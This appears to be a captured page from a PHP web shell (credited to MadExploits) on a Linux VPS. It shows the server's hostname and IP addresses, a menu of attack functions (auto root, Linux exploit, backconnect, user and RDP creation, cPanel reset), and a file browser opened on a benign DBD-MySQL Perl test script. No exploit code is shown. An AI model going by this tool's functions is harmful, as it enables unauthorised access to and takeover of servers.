Linux vps-4302913.novaexata.com.br 3.10.0-1160.139.1.el7.tuxcare.els2.x86_64 #1 SMP Mon Nov 3 13:30:41 UTC 2025 x86_64
Apache
: 162.214.88.42 | : 216.73.216.156
166 Domain
7.3.33
wwnova
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
perl-DBD-MySQL-4.023 /
eg /
[ HOME SHELL ]
Name
Size
Permission
Action
bug14979.pl
789
B
-rw-r--r--
bug21028.pl
2.19
KB
-rw-r--r--
bug30033.pl
868
B
-rw-r--r--
bug30033pg.pl
456
B
-rw-r--r--
decimal_test.pl
839
B
-rw-r--r--
issue21946.pl
848
B
-rw-r--r--
prepare_memory_usage.pl
450
B
-rw-r--r--
proc_example1.pl
1.03
KB
-rw-r--r--
proc_example2.pl
1.38
KB
-rw-r--r--
proc_example2a.pl
1.29
KB
-rw-r--r--
proc_example2b.pl
1.27
KB
-rw-r--r--
proc_example3.pl
901
B
-rw-r--r--
proc_example4.pl
1.36
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : bug30033.pl
#!/usr/bin/perl use strict; use warnings; use Data::Dumper; use Getopt::Long; use DBI; our $opt_prepared; GetOptions ( "p|prepared" => \$opt_prepared ); my $dsn = "DBI:mysql:database=test;host=localhost"; $dsn .= ";mysql_server_prepare=1" if $opt_prepared; my $dbh = DBI->connect( $dsn, 'root', '', { RaiseError => 1 } ) or die $DBI::errstr; unlink('./bug3033.trace.log'); $dbh->trace(4, './bug3033_trace.log'); $dbh->do('DROP TABLE IF EXISTS buggy'); $dbh->do('CREATE TABLE buggy ( id int(3) )'); $dbh->do('INSERT INTO buggy (id) VALUES (1)'); my $query= "SELECT id FROM -- It's a bug buggy WHERE id = ?"; print "with var:\n"; my $ref= $dbh->selectall_arrayref($query, {}, 1); print Dumper $ref; print "with string terminator:\n"; $ref= $dbh->selectall_arrayref(<<END, {}, 1); SELECT id FROM buggy -- It's a bug! WHERE id = ? END print Dumper $ref;
Close